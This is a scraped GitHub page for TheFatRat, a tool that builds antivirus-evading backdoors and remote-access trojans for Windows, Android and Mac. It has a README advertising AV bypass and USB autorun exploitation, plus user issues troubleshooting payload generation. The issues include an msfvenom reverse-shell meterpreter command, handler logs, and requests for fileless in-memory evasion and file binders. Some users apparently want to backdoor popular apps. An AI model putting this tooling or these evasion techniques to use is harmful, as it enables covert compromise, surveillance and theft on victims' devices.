screetsec / thefatrat

TheFatRat, a massive exploiting tool: an easy tool to generate backdoors and an easy tool for post-exploitation attacks such as browser attacks. This tool compiles malware with a popular payload, and the compiled malware can then be executed on Windows, Android and Mac. Malware created with this tool can also bypass most AV software protection.

License: GNU General Public License v3.0

Shell 7.37% C 76.53% CMake 0.06% C++ 0.66% RenderScript 11.92% Ruby 0.14% Python 3.32% C# 0.01%
thefatrat bypass linux autorun bypass-av antivirus hacking dracos backdoor metasploit-framework malware kali-linux msfvenom bypassantivirus rat remote accessibility trojan remote-access tool

thefatrat's Introduction

TheFatRat

A Massive Exploiting Tool

TheFatRat is an exploiting tool which compiles malware with a famous payload, and the compiled malware can then be executed on Linux, Windows, Mac and Android. TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus.

Information

This tool is for educational purposes only. Usage of TheFatRat for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Features !

  • Fully Automating MSFvenom & Metasploit.
  • Local or remote listener Generation.
  • Easily Make Backdoor by category Operating System.
  • Generate payloads in Various formats.
  • Bypass anti-virus backdoors.
  • File pumper that you can use for increasing the size of your files.
  • The ability to detect external IP & Interface address.
  • Automatically creates AutoRun files for USB / CDROM exploitation.

But it's shit! And your implementation sucks!

  • Yes, you're probably correct. Feel free to "Not use it" and there is a pull button to "Make it better".

Installation

Instructions on how to install TheFatRat

git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh

Update

cd TheFatRat
./update && chmod +x setup.sh && ./setup.sh

Troubleshoot on TheFatRat

Use the chk_tools script if you run into problems with fatrat's setup.sh. It checks whether everything is at the right version to run fatrat and also provides you with a solution for the problem.

cd TheFatRat
chmod +x chk_tools 
./chk_tools

Documentation

Changelog

All notable changes to this project will be documented in this file.

About issues

  • Read the document before making an issue

Alternative Best Tool - Generating Backdoor & Bypass

Credits & Thanks

License

TheFatRat is made with 🖤 by Edo Maland & All Contributors. See the License file for more details.

thefatrat's People

Contributors

isfaaghyth, mrusme, n0login, navanchauhan, peterpt, screetsec

thefatrat's Issues

external

Hi, thanks for your great work. I have a question: does this work with an external PC/mobile (Android)? I tried it with an external mobile and it's not working, even if I change my local IP to the external IP :/ PS: it works great with a local phone.

cp: cannot stat / rm: cannot remove

Hi, I have got this problem on my Kali rolling. I have tried to find the solution on the web but cannot find the answer, help me. Here is my choice: [05] Backdooring Original apk [Instagram, Line,etc].

W: /usr/bin/aapt: symbol lookup error: /usr/lib/i386-linux-gnu/android/libaapt.so.0: undefined symbol: _ZN7android12AssetManager12addAssetPathERKNS_7String8EPi
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 127): [/usr/bin/aapt, p, --min-sdk-version, 14, --target-sdk-version, 23, --version-code, 103018, --version-name, 1.3.1, -F, /tmp/APKTOOL3270487503658159053.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat/output/original/res, -M, /root/TheFatRat/output/original/AndroidManifest.xml]
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:473)
at brut.androlib.Androlib.buildResources(Androlib.java:407)
at brut.androlib.Androlib.build(Androlib.java:306)
at brut.androlib.Androlib.build(Androlib.java:263)
at brut.apktool.Main.cmdBuild(Main.java:224)
at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 127): [/usr/bin/aapt, p, --min-sdk-version, 14, --target-sdk-version, 23, --version-code, 103018, --version-name, 1.3.1, -F, /tmp/APKTOOL3270487503658159053.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat/output/original/res, -M, /root/TheFatRat/output/original/AndroidManifest.xml]
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:439)
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:459)
... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 127): [/usr/bin/aapt, p, --min-sdk-version, 14, --target-sdk-version, 23, --version-code, 103018, --version-name, 1.3.1, -F, /tmp/APKTOOL3270487503658159053.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat/output/original/res, -M, /root/TheFatRat/output/original/AndroidManifest.xml]
at brut.util.OS.exec(OS.java:95)
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:433)
... 6 more
[*] Signing output/fatrat_backdoored.apk ..
[+] Infected file output/fatrat_backdoored.apk ready.

cp: cannot stat '/root/TheFatRat/output/output/fatrat_backdoored.apk': No such file or directory
java.io.FileNotFoundException: /root/TheFatRat/backdoored/apkembed.apk (No such file or directory)
at java.util.zip.ZipFile.open(Native Method)
at java.util.zip.ZipFile.<init>(ZipFile.java:219)
at java.util.zip.ZipFile.<init>(ZipFile.java:149)
at java.util.jar.JarFile.<init>(JarFile.java:166)
at java.util.jar.JarFile.<init>(JarFile.java:145)
at com.android.signapk.SignApk.main(SignApk.java:320)
rm: cannot remove 'backdoored/apkembed.apk': No such file or directory

Mingw32

I've run setup.sh but it still says that mingw32 needs to be installed.

Showing error

Using [05] Backdooring Original apk [Instagram, Line,etc] and then error

setup.sh

Hello, in Kali-rolling the setup.sh doesn't work. Error:
Setup Detected that your previous run was interrupted in middle , fixing your original repositories list .
Your Original repository list was recovered. ;) ..... beginning setup

Cleaning previous repositories cache & updating your repository .

./setup.sh: ligne 49: erreur de syntaxe près du symbole inattendu « fi »
./setup.sh: ligne 49: `fi'

Have you got a solution, please?

Kali Linux Rolling incompatible

Wasn't sure where to put this as I am new to GitHub. I am running Kali Linux rolling 4.6.0-kali1-amd64 and had trouble running your scripts. Just wanted to add the fix I applied in case others are troubled. By the way, great work here.

Problem 1: When first running the program it finds the mingw installation but then right after it fails and says it isn't installed.
Solution: I noticed that the fatrat program checks for the mingw installation twice, so edit the fatrat program and comment out the second mingw check (specifically lines 266-283).

Problem 2: Compiling was failing when running the Powerfull option
Solution: edit the powerfull.sh script file and replace all instances of this string '586-mingw32msvc-gcc' with this string 'i686-w64-mingw32-gcc'

After those simple tweaks, all is well. Thanks again for writing this, very helpful.

feedback.

Hi !

You left your IP address and your port in your code ;)

"php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6000 R > output/$fira.php "

error

My answer :

msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php

Very good Job !!

Setup.sh not working

I keep getting this error when running setup.sh.


/root/Documents/TheFatRat/setup.sh: line 49: syntax error near unexpected token `fi'
/root/Documents/TheFatRat/setup.sh: line 49: `fi'

mingw32

[!]::[Check Dependencies]:
[✔]::[Check User]: root
[✔]::[Internet Connection]: connected!
[✔]::[apache2 Server Kali ]: installation found!
[✔]::[msfconsole]: installation found!
[✔]::[msfvenom]: installation found!
[✔]::[Zenity]: installation found!
[x]::[warning]:this script require mingw32 installed to work

[!]::[please wait]: please run setup.sh ....

I have this problem, what should I do?

Binding to other files

Very nice project, would you please add a file binder? It can combine output with another file with 100% FUD?

Thanks .

Error when 'Powerful.exe' file is launched

Hello and thank you for your program,
I generated a 'Powerful.exe' file with option 2 of the TheFatRat program. When I launch it on Windows 7 64 bits or Windows 8 64 bits or Windows 10 64 bits, an error occurs: 'The program has stopped working'. So I can't exploit a device.

I should specify that when I generate a different RAT with the other options, the .exe file works perfectly and I can exploit devices. But on Windows, Kaspersky deletes the .exe file of these RATs.

How can I patch the problem and make 'Powerful.exe' work?

Thank you very much.

MinGW compiler not installing

Hi, I come here today because I've got a problem with the TheFatRat installation.
The setup.sh script checks all the dependencies, and it finds that the MinGW compiler isn't installed on my system.
So it tries to install it and spawns a terminal window that disappears immediately.
When I try to launch thefatrat, it says that the MinGW compiler isn't installed, and it asks me to run setup.sh, which is unable to fix it.....
Any idea? I use Kali Rolling edition (2016.1)

cmd shell

When run payload on Windows machine cmd shell stays open!! Just for information!
And some feature request, add meterpreter/reverse_tcp_dns like option!
Thanks and cool automation script!

[Feature Request] Detection Reporting

Can you build in the option for people to anonymously report if a payload has been detected by a specific AV, which would then appear next to the payload and also show which AV it was detected by.
Thanks

thefatrat not detect metasploit - gentoo

When launching the setup.sh script as root, the which command does not detect my installation of Metasploit in
/usr/local/bin/msfconsole
and unfortunately I have to run the script as root. As seen in the screenshot, if you launch which as a regular user there are no problems, while root you.
I am on gentoo hardened
screenshot:
http://imgur.com/aRMdaBQ

Nothing works on vista 64 bit

On Vista 64 bit. There is no inbuilt PowerShell and the slow FUD will not work on Win Vista 64 bit. No options work now. It is all detected by either AV or there is no PowerShell!

hello

If I want to install the Mac OS X above need to do those jobs?

apk not installed

I was working on installing a backdoor on my android device, in case it is lost or stolen. The first .apk FatRat built installed perfectly, but every one after that has returned with an error "App not installed" I have set my device to allow 3rd party apps, and as I said the first .apk I tried installed just fine, I had messed up on my end and entered the ip incorrectly. I even, in a desperate attempt, tried building a new .apk with the same errors as my first one, and IT would not install on the device.
https://www.youtube.com/watch?v=yoMIbG1JJ74
That is the tutorial I have followed exactly, it's a pretty simple process and I've damn near memorized it at this point.
-Do I need to remove my first installation to try a different one?
-Where does the .apk install to on the device?
-Am I able to change the lhost and lport on the .apk after it has been created, instead of creating multiple .apk files?
-Is there a different process that I am unaware of since I am on a virtual machine (Kali) running on windows 10?

You don't need to walk me through it if there is a nice tutorial or bit of information somewhere that I haven't found just link me and I'll be on my way. Appreciate any help in advance. Sorry to bother, hope I'm in the right place.

backdoor-factory -> not found

systems: ubuntu14.04LTS
sudo apt-get update
sudo apt-get install backdoor-factory
No software package found

Prompt during installation: backdoor-factory -> not found.

please

Option 2 (create fud 100% backdoor) .exe not responding in win 10 64bit

So I have made a FUD backdoor in an exe file named powerfull.exe, and when I try to execute it on my Win 10 computer it opens a black shell (like it should), but very soon after that Windows says powerfull.exe stopped working. I disabled my AV and UAC but the problem is the same.
Does anyone have a solution for this? My fatrat is the latest possible version.

Discuss

I was unable to create the pull request from my git to yours because there are massive changes in my git that crash my Firefox when git is analyzing the differences.
FatRat is originally your creation, so in good faith I believe that I should send you a pull request every time some good changes are made.

FatRat becomes FatRat 1.9beta
and the changes are :

  • APK (5) rat rebuild totally changed .
    (adapted backdoor-apk script to fatrat to both work together)

  • APKS have a new payload hiding method in rat apk to not be detected .

  • Apktool will no longer be installed by setup.sh, and the same applies to dx and zipalign
    (apktool in the Debian repo is 2.2.1, and that version has a bug that gives an error when compiling the apks, so apktool and the Android tools were updated to the latest version 25.0.2 and embedded in the (tools) directory of fatrat).

  • Some other changes were made but i can not remember everything now because i have been doing the changes since beginning of last week .

The only way that i see for you to merge my git to yours is :
-cloning my git to your hard disc
-Enter hidden directory .git in my git and change from :
https://github.com/peterpt/TheFatRat
to
https://github.com/Screetsec/TheFatRat

and then over the terminal do a git push to your account , so all files can be changed .

If you do not want to merge then there is no problem .

Anyway , here are the new changes
https://www.youtube.com/watch?v=Nj7AFEBjvdQ

Question

When executed it dies on the test PC. I see the syn_sent but after a few it stops, any idea? It was not detected by AV.

cmd shell windows !!!!

First, salamo 3alikom. Thanks for this great job, but when I launch your payloads the cmd shell window pops up, and when I close it the session is gone. Fix this please!!! Thanks.

Generate error

   	                     ::::::::: 	

-                 REMAKE: Screetsec ( Edo -maland- ) 
      OPEN SOURCE :  NCC Group Plc ( http://www.nccgroup.com ) 
  DEVELOPED :  Daniel Compton, daniel dot compton at nccgroup dot com 
========================================================================
          METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION 2.1  
========================================================================


TYPE THE DESIRED OUTPUT FILENAME : px


TYPE THE DESIRED LABEL FOR THE AUTORUN FILES : px


TYPE YOUR LHOST : xxx.xxx.xxx.xxx


TYPE YOUR LPORT : 8317



[-] Generating Metasploit payload, please wait...


[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 354 bytes




						
==================================================================
   __            _                                    _  __  
  / _|_   _  ___| | ___   _  ___  _   _ _ __ ___  ___| |/ _| 
 | |_| | | |/ __| |/ / | | |/ _ \| | | | '__/ __|/ _ \ | |_  
 |  _| |_| | (__|   <| |_| | (_) | |_| | |  \__ \  __/ |  _| 
 |_|  \____|\___|_|\_\___ |\___/ \____|_|  |___/\___|_|_|   
                      |___/                                 
==================================================================

            ||||||||||||||	
           =              \       
           =               |	
          _=            ___/	
         / _\           (o)\	
        | | \            _  \	
        | |/            (____)	
         \__/          /   |	
          /           /  ___)	
         /    \       \    _)                        ) 
        \      \           /         TheFatRat      ( 
      \/ \      \_________/   |\___________________  ) 
       \/ \      /            |     ==== _______)__) 
        \/ \    /           __/___  ==== _/  
         \/ \  /           (O ____)\_(_/ 
                          (O _ ____) 
                           (O ____) 

================================================================= 


 1. Normal [ 400K payload ]  - [ fast compile ]  

 2. Stealth [ 1-2 MB payload ] - [ fast compile ] 

 3. Super Stealth - [ 10-20MB payload ] 

 4. Insane Stealth - [ 50MB payload ] 

 5. Desperate Stealth - [ 100MB payload ] 

 TYPE THE NUMBER IF YOU WANT :  1


[-] Normal selected, please wait a few seconds

[-] Generating random seed for padding...please wait

[ 01100111001001001110111001101010101010110101001010111001010101010101   ]
build.c:112:15: error: redefinition of ‘padding’
 unsigned char padding[]=
               ^~~~~~~
build.c:2:15: note: previous definition of ‘padding’ was here
 unsigned char padding[]=
               ^~~~~~~
build.c:114:6: error: redefinition of ‘payload’
 char payload[] =
      ^~~~~~~
build.c:4:6: note: previous definition of ‘payload’ was here
 char payload[] =
      ^~~~~~~
build.c:171:6: error: redefinition of ‘comment’
 char comment[512] = "";
      ^~~~~~~
build.c:106:6: note: previous definition of ‘comment’ was here
 char comment[512] = "";
      ^~~~~~~
build.c:172:5: error: redefinition of ‘main’
 int main(int argc, char **argv) {
     ^~~~
build.c:107:5: note: previous definition of ‘main’ was here
 int main(int argc, char **argv) {
     ^~~~
build.c:177:15: error: redefinition of ‘padding’
 unsigned char padding[]=
               ^~~~~~~
build.c:2:15: note: previous definition of ‘padding’ was here
 unsigned char padding[]=
               ^~~~~~~
build.c:179:6: error: redefinition of ‘payload’
 char payload[] =
      ^~~~~~~
build.c:4:6: note: previous definition of ‘payload’ was here
 char payload[] =
      ^~~~~~~
build.c:248:6: error: redefinition of ‘comment’
 char comment[512] = "";
      ^~~~~~~
build.c:106:6: note: previous definition of ‘comment’ was here
 char comment[512] = "";
      ^~~~~~~
build.c:249:5: error: redefinition of ‘main’
 int main(int argc, char **argv) {
     ^~~~
build.c:107:5: note: previous definition of ‘main’ was here
 int main(int argc, char **argv) {
     ^~~~

[!] Something went wrong trying to compile the executable, exiting

➜  TheFatRat git:(master) ✗ 

Payload doesn't created on kali linux rolling 1

Payload flash_player.exe isn't created on Kali Linux rolling 1.
I have all dependencies.

cp: cannot stat '/root/TheFatRat/output/output/fatrat_backdoored.apk': No such file or directory
java.io.FileNotFoundException: /root/TheFatRat/backdoored/apkembed.apk (No such file or directory)
at java.util.zip.ZipFile.open(Native Method)
at java.util.zip.ZipFile.<init>(ZipFile.java:219)
at java.util.zip.ZipFile.<init>(ZipFile.java:149)
at java.util.jar.JarFile.<init>(JarFile.java:166)
at java.util.jar.JarFile.<init>(JarFile.java:145)
at com.android.signapk.SignApk.main(SignApk.java:320)
rm: cannot remove 'backdoored/apkembed.apk': No such file or directory

Help me omm ....

Idea to change setup script

Hi, I was looking into your script and I noticed that on setup the script backs up sources.list, creates a new sources.list with Kali repositories, and then does an apt-get update and installs the tools.
You should keep in mind that many people may already have Metasploit installed on their system, not from apt repositories.
You should give an option in setup.sh for the user to select where Metasploit and its modules are installed, instead of doing all the current process.
My system is a Devuan (non-systemd), Kali Sana is systemd. If I had not stopped the script when it was doing the update, then by this time my Metasploit installation in /opt/ would have been messed up with the old Metasploit that your script was going to install from repositories, and this without even speaking of the incompatibility of Devuan repo libraries with Kali Sana.
The Kali Sana repo does not update metasploit-framework anymore, only the rolling repositories do that, so according to your script you are installing an old version of Metasploit into the user's Linux distro that will never be updated again using the repositories you applied.
An idea is to install Metasploit from git (which involves a deeper approach) on the user's machine and set up your config script to open Metasploit from there.
Here is how it should be done from git:
(The instructions say Kali wheezy, but it can be installed on any Debian or Debian-forked distro, because the main libraries are available in those distros too.)
http://pastebin.com/STc07QM5

I don't have msfvenom installed here yet, but I will install it manually, so I cannot rely on apt updates, and I will take a look at your script.

You could use a "path.config" file and set up all tool paths in that file one after another, then you could use "sed" to read the path of a tool and declare it as a variable.
Example of a "paths.config" file:

"
/opt/metasploit-framework/msfvenom
/opt/backdoor-factory/backdoor.py"

on your script you can call sed to read the path of a tool and declare it as a variable , by this , instead using :

"backdoor-factory -f $embed -s $payload -H $yourip -P $yourport -o output/$"

you could use :
"$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$"

This concept could be set to those people that have these tools installed from git instead apt .
However these configurations should be set during your "setup.sh" , and a possible choice could be given to user on setup like :

"Metasploit was not detected , press y to install it from repository , or press n to configure its path"

something like this , well , was just an idea .

error create embeded backdoor factory (point 5)

     Author:    Joshua Pitts
     Email:     the.midnite.runr[-at ]gmail<d o-t>com
     Twitter:   @midnite_runr
     IRC:       freenode.net #BDFactory
     
     Version:   3.4.2

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
Traceback (most recent call last):
File "/usr/share/backdoor-factory/backdoor.py", line 62, in <module>
class bdfMain():
File "/usr/share/backdoor-factory/backdoor.py", line 610, in bdfMain
result = supported_file.run_this()
File "/usr/share/backdoor-factory/pebin.py", line 168, in run_this
return self.patch_pe()
File "/usr/share/backdoor-factory/pebin.py", line 1799, in patch_pe
_, self.flItms['resumeExe'] = targetFile.resume_execution_32()
File "/usr/share/backdoor-factory/intel/intelCore.py", line 340, in resume_execution_32
CallValue = int(CallValue, 16)
ValueError: invalid literal for int() with base 16: 'dword ptr [0x402000]'
Shell Saved To /backdoored/output/ press any key to continue

APK RAT FILE WAS NOT FOUND

Not saving backdoored apk file. The last lines as follows:

File copied with success to : /root/Desktop/TheFatRat-master/backdoored
Removing temporary files from output
Signing your APK file
Usage: signapk publickey.x509[.pem] privatekey.pk8 input.jar output.jar
[!] APK Rat file was not found in : /root/Desktop/TheFatRat-master/backdoored/output/

[FUD EXE]Stopped Working OS : WINDOWS 7 64 BIT

Hello ,

  • While using your Fud 100% Option 2.
  • After Powerful- Fud exe Generated .

i set Exploit Handler by Giving Payload windows/meterpreter/reverse_tcp

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.62.128:8985
[*] Starting the payload handler...

I m Not Getting Any Shell on Linux machine , I Have Followed all the Steps Mentioned

Here : https://github.com/Screetsec/TheFatRat#getting-started

https://www.youtube.com/watch?v=hjkBttKTVnI

Any Sol?

Some details

Hi, I have some important points. The first is that after a little time the program called powerfull closes. Another detail: I think the cmd alert is unnecessary, but I think this depends on people's knowledge of programming in C. Thanks for this, to improve and know more about Kali Linux and the toolkit.

Suggestions:

Latest changes in setup installation packages can pop up errors on executing the ruby script if imagemagick is not installed:

require 'fileutils' -> https://rubygems.org/gems/fileutils/versions/0.7
requires RMagick, which depends on ImageMagick 6.4.9 or later

imagemagick requires libmagickwand-dev .

resuming :
unless user install these packages using "gem install" , then on a non pentest linux distro an error on ruby script can popup due to these missing packages .

Zip align is not needed in setup now until we implement backdoor-apk script , i forgot to remove it from apt-sources .

Linux mint

Hi,

When I try to install ./setup.sh it's ok, but I can't install "mingw32".

terminal show me "mingw32 compiler -> not found ".

how can i do?



-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia
-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- --

[!]::[Check Dependencies]:
[✔]::[Distro]: Linux
[✔]::[Check User]: root
[✔]::[Internet Connection]: connected!
[✔]::[Apache2 Server Linux ]: installation found!
[✔]::[Msfconsole]: installation found!
[✔]::[Msfvenom]: installation found!
[✔]::[Zenity]: installation found!
[x]::[warning]:this script require mingw32 installed to work

[!]::Run setup.sh to install ming32

i run setup.sh blablablabla, but not ming32 not get

Request: Enhanced Evasion Idea

Can you add support for complete memory integration? For example, can you get the payload to load and run completely in memory and not write anything to disk, and start up using the registry?

As this would greatly help to evade detection, by creating less of a footprint and have less for the AV to scan additionally, lots of AV don’t scan memory or registry.

Thanks

Session close with migrate process

Sorry for my language, I'm Italian. Today I tried the option Create FUD 100% BACKDOOR and used easybinder ("it has always worked for me") to bind it with one pic, and I set the migrate process in msfconsole. The problem is that when I run the file generated with easybinder, named pippo.exe, it opens a Windows prompt with the name powerfull.exe; it creates a session on Metasploit and migrates the process correctly, but when I close the powerfull.exe Windows prompt the session is dead. I tested it directly on my Kali Linux with Wine but I think it is the same. Thanks for your support.

The created FUD does not work on 64 bit Windows 7/10.

Hello!

First, it's a really great tool.
I tested it on 32 bit Windows 7 on a virtual machine - no problems, everything works.
But I tried to test it in a normal environment, on my PCs, both are 64 bits, Windows 7 and Windows 10.
It crashes about 3 seconds after launch, does not even establish a connection.

Can't use microsploit

I use microsploit for creating microsoft office backdoor.
I found this error after creating [2] The Microsoft Office Macro on Windows :
mv: cannot stat ‘/home/silentc0ders/.msf4/local/wwww.docm’: No such file or directory

TheFatRat 1.9.2

Google Chrome Recognizes as Malware

I zipped up the resulting .EXE (generated one for Windows) and emailed it to myself. When I try to download it, Google Chrome recognizes the zip file as malware.

[Feature Request] Hash Checking

Can you add the option to check the payload hash through VirusTotal, NoDistribute and others to see if the payload has been uploaded and scanned, like Veil-Evasion has.
Thanks
